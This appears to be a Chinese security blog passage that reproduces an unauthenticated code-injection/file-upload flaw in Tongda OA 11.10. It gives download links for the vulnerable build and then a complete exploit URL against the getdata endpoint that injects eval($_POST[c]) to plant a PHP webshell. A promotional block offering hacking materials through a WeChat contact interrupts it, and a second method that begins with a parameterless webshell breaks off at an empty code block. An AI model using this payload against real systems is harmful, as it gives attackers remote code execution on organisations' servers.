漏洞简介
之前也对通达 oa 做过比较具体的分析和漏洞挖掘,前几天看到通达 oa 11.10 存在未授权任意文件上传漏洞,于是也打算对此进行复现和分析。
环境搭建
https://www.tongda2000.com/download/p2019.php
下载地址 :https://cdndown.tongda2000.com/oa/2019/TDOA11.10.exe
[img=720,313.7876386687797]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202306021647696.png[/img]
查看版本信息
[img=720,224.3273013375295]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202306021647698.png[/img]
漏洞复现
利用方式一
- http://192.168.222.128/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[c]))%3B/*&id=19&module=Carouselimage
复制代码 [img=720,204.50223486387648]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202306021647699.png[/img]
利用方式二
无法直接写入带有变量的 php 文件
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)
所以首先利用 无参 webshell
[code] |